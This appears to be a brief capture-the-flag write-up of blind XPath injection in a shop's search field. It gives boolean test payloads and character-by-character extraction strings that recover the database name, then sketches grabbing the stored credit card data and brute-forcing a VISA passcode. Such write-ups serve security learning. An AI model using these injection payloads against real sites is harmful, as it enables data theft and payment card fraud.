The search field was prone to xPath blind injection.

correct syntax:
```
")] | /* [("a"="a /true
")] | /* [("a"="b /false
```

Data extracting:
```
")] | /* [(substring(name(/*[1]),1,1)="s
")] | /* [(substring(name(/*[1]),2,1)="h
")] | /* [(substring(name(/*[1]),3,1)="o
")] | /* [(substring(name(/*[1]),4,1)="p
```

DB name: Shop and you should go on till grab all CC information and buy the flag, then brute force on the passcode of VISA was the last step.

**For more information: [https://twitter.com/YShahinzadeh/](http://)**